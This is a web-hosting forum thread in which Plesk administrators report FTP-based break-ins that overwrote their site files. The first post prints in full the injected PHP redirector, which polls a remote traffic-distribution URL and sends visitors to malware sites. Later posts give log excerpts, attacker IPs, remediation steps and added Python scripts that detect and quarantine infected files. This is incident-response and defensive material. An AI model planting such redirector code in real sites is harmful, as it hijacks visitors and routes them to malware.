
Under Attack?

PGT92

New Pleskian
I run several domains under Plesk 10.0.0.

Last night I discovered that one of my domains had all the html and php files in the directory replaced with files that redirected visitors to a malware site. There was also a new domain created with a number of files in the directories. A quick Google search turned up a thread that showed I wasn't the only one: http://www.webhostingtalk.com/showthread.php?t=1253158

I removed the new domain and files, then replaced all the pages with redirects. I then changed my access passwords. Finally, I updated to Plesk 11.0.9. This was at 5am this morning.

I just discovered that there were two additional occurrences after this... one about two hours later and another about two hours after that. From what I've found, three other domains had all their web root directory files overwritten with files that included the following php code:
Code:
// Suppress PHP error output so the redirector fails silently on the victim site.
ini_set('display_errors',0);
// Polyfill for PHP builds that lack sys_get_temp_dir() (older than 5.2.1).
if(!function_exists('sys_get_temp_dir')){
    function sys_get_temp_dir(){
        if(!empty($_ENV['TMP'])){
            return realpath($_ENV['TMP']);
        }
        if(!empty($_ENV['TMPDIR'])){
            return realpath($_ENV['TMPDIR']);
        }
        if(!empty($_ENV['TEMP'])){
            return realpath($_ENV['TEMP']);
        }
        $tempfile=tempnam(__FILE__,'');
        if(file_exists($tempfile)){
            unlink($tempfile);
            return realpath(dirname($tempfile));
        }
        return null;
    }
}
// Remote "traffic distribution" endpoint that hands out the current redirect target.
$geturl='http://188.190.124.81/tds.php';
// Re-poll the remote endpoint at most once every 180 seconds.
$timeout=180;
// Target used until the first successful poll.
$default_url='http://www.google.com/robots.txt';
if(!$geturl)exit();
// Cache location: <upload_tmp_dir or system temp dir>/settings.json.
// For responders this file is a useful on-disk indicator of the infection.
$base=ini_get('upload_tmp_dir');
if($base==null)$base=sys_get_temp_dir();
$tmp_settings=$base."/settings.json";
$settings=file_exists($tmp_settings)?unserialize(file_get_contents($tmp_settings)):array('last'=>0,'url'=>$default_url);
// Refresh the cached target when it is older than $timeout seconds.
if($settings['last']<time()-$timeout){
    // Note: assignment, not comparison. The fetched URL is stored in the cache.
    if($settings['url']=file_get_contents($geturl)){
        $settings['last']=time();
        $fp=fopen($tmp_settings,'w');
        flock($fp,LOCK_EX);
        fputs($fp,serialize($settings));
        flock($fp,LOCK_UN);
        fclose($fp);
    }
}
// Redirect the visitor to the current target, prefixing http:// if a bare host was returned.
$url=$settings['url']?$settings['url']:file_get_contents($geturl);
if(substr($url,0,4)!='http')$url="http://".$url."/";
header("Location: $url");
exit();

I once again replaced the files and changed some passwords. I checked web access and Plesk logs, but there's nothing out of the ordinary. I ran Watchdog, but nothing came up that I couldn't rule out from Google searches.

Any ideas on where to look for the problem?
 
Hi PGT92,

Please check your last FTP access (i.e. last -60) and look for an IP address that has accessed several FTP accounts.

Seems like some kind of Plesk security issue, or more of a proftpd vulnerability.

We've just found 2 servers with the same problem. Both Plesk 11.0.9 with MU #48, plain vanilla install 1 week ago.

cat /usr/local/psa/version
11.0.9 Debian 6.0 110120608.16

proftpd -v
ProFTPD Version 1.3.4a

For now, you should clean all modified files, list them:
find /var/www/vhosts/*/httpdocs/*php -ctime -2
Block those IPs in iptables, and stop proftpd (switch it off in /etc/xinetd.d/ftp_psa and restart xinetd).

We're still investigating. But for now it seems like a Plesk security issue. Someone gets access to Plesk accounts and just logs in...
 
It seems most of the log files have been cleared when I upgraded Plesk. I did notice that the creation date on the mysterious domain that appeared was April 2nd... unfortunately my Plesk action log file only goes back 30 days, so I can't see the records of when that was created.
 
Hi PGT92.

In fact, on both, we found the phantom domain "superkkt.com" on the old server, but we reinstalled the whole server and imported only the selected domains with PMM.
Maybe some websites were already infected with some sort of trojan?
We're already inspecting all files on the servers.
 
Someone, please provide me the exact OS, Plesk, microupdate and proftpd versions of the server which you suspect is vulnerable. And provide more details on why you think so. Thanks.
 
Hi Igor:

11.0.9 with MU #48 plain vanilla installed 1 week ago.

cat /usr/local/psa/version
11.0.9 Debian 6.0 110120608.16

proftpd -v
ProFTPD Version 1.3.4a

We found logins with FTP accounts that had not been given to the customer. Just random (secure) generated ones from 1 week ago, when the server was reinstalled.
 
Hi Igor,

10.4.4 Update #49, last updated at April 27, 2013 06:26 AM
OS: Linux 2.6.32-34-generic-pae
Ubuntu 10.04
 
Confirm we're also seeing this.

Plesk 9.5.4
9.5.4 CentOS 5 95110630.14
ProFTPD Version 1.3.2e

Further information: we maintain IP restrictions on mysql and shell access.

Example log entries:

> May 5 06:56:58 lnx03 xinetd[7535]: START: ftp pid=1675 from=188.190.124.120
> May 5 06:56:58 lnx03 proftpd[1675]: OURHOST (188.190.124.120[188.190.124.120]) - FTP session opened.
> May 5 06:56:58 lnx03 proftpd[1675]: OURHOST (188.190.124.120[188.190.124.120]) - Preparing to chroot to directory '/var/www/vhosts/subdomain.example.com'
or..

> May 7 16:17:00 lnx03 xinetd[7535]: START: ftp pid=21778 from=188.190.124.81
> May 7 16:17:00 lnx03 proftpd[21778]: OURHOST (188.190.124.81[188.190.124.81]) - FTP session opened.
> May 7 16:17:00 lnx03 proftpd[21778]: OURHOST (188.190.124.81[188.190.124.81]) - Preparing to chroot to directory '/var/www/vhosts/example.com'
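The check suggested earlier in the thread (one address logging into several FTP accounts) can be automated against the proftpd lines quoted above. The following is an added example, not Plesk or proftpd code: it parses the "Preparing to chroot" lines, groups the vhost directories reached per client IP, and flags addresses that touch several vhosts or that appear on the block list posted later in this thread. The sample log is constructed, modelled on the quoted lines; 10.0.0.5 stands in for a legitimate customer, and the function names are mine.

```python
#!/usr/bin/env python3
"""Group ProFTPD sessions by client IP and flag IPs that reach several
vhost directories. Added example for the thread above; not Plesk code."""
import re
import sys
from collections import defaultdict

# Matches the "Preparing to chroot" line in the quoted log: captures the
# client IP (first address in the parentheses) and the vhost directory.
CHROOT_RE = re.compile(
    r"proftpd\[(?P<pid>\d+)\]: \S+ \((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\[[^\]]*\]\) "
    r"- Preparing to chroot to directory '(?P<dir>[^']+)'"
)

# Addresses reported in this thread as the source of the logins.
KNOWN_BAD = {"60.177.172.250", "88.198.20.247", "188.190.124.120", "188.190.124.81"}


def sessions_by_ip(lines):
    """Return {ip: {vhost_dir, ...}} built from the chroot lines in *lines*."""
    hits = defaultdict(set)
    for line in lines:
        m = CHROOT_RE.search(line)
        if m:
            hits[m.group("ip")].add(m.group("dir"))
    return hits


def suspicious_ips(lines, min_accounts=2):
    """IPs that log into at least *min_accounts* distinct vhosts, or that are
    on the block list. Returns a sorted list of (ip, sorted_dirs, reason)."""
    out = []
    for ip, dirs in sorted(sessions_by_ip(lines).items()):
        reasons = []
        if len(dirs) >= min_accounts:
            reasons.append(f"{len(dirs)} vhosts from one address")
        if ip in KNOWN_BAD:
            reasons.append("on block list")
        if reasons:
            out.append((ip, sorted(dirs), "; ".join(reasons)))
    return out


# Constructed sample, modelled on the lines quoted in the post above.
# 10.0.0.5 is a fictitious legitimate customer; the other address is from the thread.
SAMPLE_LOG = """\
May  7 16:17:00 lnx03 xinetd[7535]: START: ftp pid=21778 from=188.190.124.81
May  7 16:17:00 lnx03 proftpd[21778]: OURHOST (188.190.124.81[188.190.124.81]) - FTP session opened.
May  7 16:17:00 lnx03 proftpd[21778]: OURHOST (188.190.124.81[188.190.124.81]) - Preparing to chroot to directory '/var/www/vhosts/example.com'
May  7 16:17:31 lnx03 proftpd[21780]: OURHOST (188.190.124.81[188.190.124.81]) - Preparing to chroot to directory '/var/www/vhosts/shop.example.net'
May  7 16:18:02 lnx03 proftpd[21783]: OURHOST (188.190.124.81[188.190.124.81]) - Preparing to chroot to directory '/var/www/vhosts/blog.example.org'
May  7 17:02:10 lnx03 proftpd[21901]: OURHOST (10.0.0.5[10.0.0.5]) - Preparing to chroot to directory '/var/www/vhosts/example.com'
May  7 17:05:44 lnx03 proftpd[21905]: OURHOST (10.0.0.5[10.0.0.5]) - FTP session closed.
""".splitlines()


if __name__ == "__main__":
    # Usage: proftpd_sessions.py /var/log/syslog   (falls back to the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG
    for ip, dirs, why in suspicious_ips(lines):
        print(f"{ip}: {why}")
        for d in dirs:
            print(f"    {d}")
```

Run it against the file that receives the proftpd facility on your box (syslog or a dedicated proftpd log); a customer normally chroots into one vhost, so several distinct directories from one address in a short window is the pattern worth a closer look.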
 
Same problem here. I found 2 domains are infected and see the bad guy's logins via FTP.

Centos 5.9
Plesk 11.0.9. MU 48
 
Plesk 11.0.9 Update #49
11.0.9 RedHat el5 110120608.16
ProFTPD Version 1.3.4a

However, the original break-in occurred under Plesk 10.0.0. Main passwords were changed and within an hour Plesk was updated to the current version. Within 4 hours there were two additional break-ins. All passwords were then changed and no additional incidents have occurred since yesterday.

I too had the 'superkkt.com' domain created. Today I remembered I have logwatch files emailed to an unused email account... I was able to find them and discovered a variety of strange occurrences beginning mid-March. Prior to this, there are no ProFTPD login attempt failures, but afterwards there are several originating from a Chinese IP. These continued from time to time until April 2nd, which is the day the 'superkkt.com' domain was created. On April 3rd, there were two logins through 'superkkt.com' from an IP in Eastlake, Michigan. After these, there are no additional logins outside of my own through ProFTPD, nor login failures.

EDIT: Just read my logwatch files from the past two days... for the break-in of May 6th, which changed files on one of my domains, there are entries for an IP in the Ukraine... this is the one that overwrote my files with redirect pages. There's a second set of entries from another IP in China, which doesn't seem to have affected anything. The Ukraine IP is seen again the following day, in the domains that I had issues with after the Plesk update. The logins are all valid logins I created, so if they're accessing ProFTPD through them, they didn't do it by guessing my passwords... they're extremely complex.
 
I'm sure you know about this http://arstechnica.com/security/201...-attack-targeting-apache-hijacks-20000-sites/
It was related to a Plesk bug in 9.x and 10.x - I think not Plesk 11.
This happened around mid-March on a large scale, so it is possible that the server was compromised a while ago and all account passwords were stolen, and when it was upgraded and migrated to the new Plesk the bad guys used the old FTP passwords. Not sure if that's the case, but it could be for some people.

looks like PARALLELS people don't take this seriously... so what I did to avoid infection until they decide to do something about it:
- plesk/ssh limited to few IPs
- changed all ftp/accounts passwords
- reinstalled sshd
- limit proftpd for now to few IP only
- installed CSF firewall to catch possible breakins and block access to the server (needs lots of adjustments for plesk)
 
 
Hi,

We run Parallels Plesk Panel 9.0 on a Windows Web Server 2008.

We have multiple domains on it, and the first one was hacked (only that one, the other 10+ are showing no problems yet). All .php files were overwritten by the code above, posted by PGT92, but only the ones in the root.
Also, Plesk stopped working and displays an "HTTP Error 503. The service is unavailable." error.
 
Same problem
Plesk 8.1.1
Windows Server 2003

Also confirming that the exploiters are getting in via FTP. It appears this security hole is affecting both Linux and Windows admins using Plesk. It does not appear that the FTP server is the issue but rather Plesk itself.

As a temporary fix, we recommend blocking the following IPs to help prevent further issues.
60.177.172.250
88.198.20.247
188.190.124.120
188.190.124.81
 
Hello,
We also had the Ukrainian visitors on our webserver.
Plesk was at 9.5.3 and I updated it immediately to 9.5.4... I don't dare to go higher. Running on Ubuntu 8.04.4 LTS (hardy).
Changed as many passwords as possible and added a few lines in the firewall (in+out).
Our Windows office network was infected at the same time by all kinds of malware. Took me days to clean everything.
Still one question: my proftpd is at version 1.3.2e. As far as I can understand, this version is the highest that works with Plesk 9.5.3.
Is that correct or can I go higher without breaking things?
Thanks for pointing that out.
Erwin
 
If you are the only one who uploads files to the server, you can stop FTP with:
chkconfig ftp_psa off
So you can check whether the attacker uses FTP or Plesk to break in. I use WinSCP (SSH) to log in as root.
 
Hi Guys,

Today I identified nearly the same behaviour on one of our old servers (all changed files have a date of 05/13/2013, more or less 01 AM).

Massive brute force against the FTP server, and on some domains the same kind of archive.

No new domains created, only archives modified.

On compromised domains ALL .php and .html files seem to be downloaded, edited and uploaded again, or at least edited on some Win box (all have ^M at the end).

I dug through the whole server and it seems OK.

Dropped all FTP traffic to all servers at firewall level, but only just now.

What is the easy way to script something to "clean" all files?? As there is no sense in a clean install and migration via PMM with compromised files.

Thank you.

Jr
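A scanner for the overwritten files, as an added example that is not part of this thread, of Plesk or of Watchdog: it walks the web roots for .php/.html files, restricted to recently changed ones in the spirit of the find -ctime -2 command earlier in the thread, looks for the indicators visible in the PHP quoted in the first post (the tds.php URL on 188.190.124.81, the settings.json cache followed by a Location header) plus the CRLF line endings Jr mentions as a weak supporting sign, and can move hits into a quarantine directory so the originals are restored from a known-good copy rather than deleted in place. The fixture files, the vhost paths and all function names are my own constructions.

```python
#!/usr/bin/env python3
"""Find files carrying the redirector's indicators under a web root and
optionally quarantine them. Added example for the thread above."""
import os
import re
import shutil
import sys
import tempfile
import time

# Indicators taken from the injected PHP quoted earlier in the thread.
INDICATORS = [
    ("c2-url", re.compile(rb"188\.190\.124\.81/tds\.php")),
    ("redirect-poller", re.compile(rb"settings\.json.*?header\(\s*[\"']Location:", re.S)),
]


def scan_file(path):
    """Return the indicator names found in *path* ([] if nothing matched)."""
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        return []
    found = [name for name, rx in INDICATORS if rx.search(data)]
    # Jr noted that every overwritten file ended in ^M (CRLF). On its own
    # that is normal for Windows-edited sites, so count it only when a
    # stronger indicator already matched.
    newlines = data.count(b"\n")
    if found and newlines and data.count(b"\r\n") == newlines:
        found.append("crlf-endings")
    return found


def scan_tree(root, exts=(".php", ".html", ".htm"), changed_within=None):
    """Walk *root*; return {path: [indicators]} for matching files. With
    *changed_within* (seconds) only files whose ctime is that recent are read,
    like `find -ctime -2` but with a configurable window."""
    now = time.time()
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            if changed_within is not None and now - os.stat(path).st_ctime > changed_within:
                continue
            found = scan_file(path)
            if found:
                hits[path] = found
    return hits


def quarantine(hits, root, qdir):
    """Move flagged files under *qdir*, keeping the path relative to *root*,
    so they stay available for analysis while clean copies are restored from
    backup. Returns the new locations."""
    moved = []
    for path in sorted(hits):
        dest = os.path.join(qdir, os.path.relpath(path, root))
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        shutil.move(path, dest)
        moved.append(dest)
    return moved


def build_sample_tree(base):
    """Constructed fixture: one clean page and one file carrying a fragment of
    the quoted redirector's indicators (constructed text, not the full script)."""
    site = os.path.join(base, "vhosts", "example.com", "httpdocs")
    os.makedirs(site, exist_ok=True)
    with open(os.path.join(site, "about.php"), "wb") as fh:
        fh.write(b"<?php\necho 'hello';\n")
    with open(os.path.join(site, "index.php"), "wb") as fh:
        fh.write(b"<?php\r\n$geturl='http://188.190.124.81/tds.php';\r\n"
                 b"$tmp_settings=$base.\"/settings.json\";\r\n"
                 b"header(\"Location: $url\");\r\nexit();\r\n")
    return base


def run_demo():
    """Build the fixture in a temp dir, scan it, quarantine the hits and
    return a summary (used for the stand-alone run and for checks)."""
    base = tempfile.mkdtemp(prefix="redirector-scan-")
    try:
        build_sample_tree(base)
        root = os.path.join(base, "vhosts")
        hits = scan_tree(root, changed_within=2 * 86400)
        moved = quarantine(hits, root, os.path.join(base, "quarantine"))
        return {
            "flagged": sorted(os.path.relpath(p, root) for p in hits),
            "indicators": sorted({i for v in hits.values() for i in v}),
            "moved": len(moved),
            "remaining": sorted(f for _, _, fs in os.walk(root) for f in fs),
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    # Usage: redirector_scan.py /var/www/vhosts   (report only; no demo fixture)
    if len(sys.argv) > 1:
        for path, found in sorted(scan_tree(sys.argv[1], changed_within=2 * 86400).items()):
            print(f"{path}: {', '.join(found)}")
    else:
        print(run_demo())
```

Pointed at /var/www/vhosts it only reports; call quarantine() deliberately once the list has been reviewed, and treat the indicator patterns as a starting point to extend with whatever the attacker left on your particular server.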
 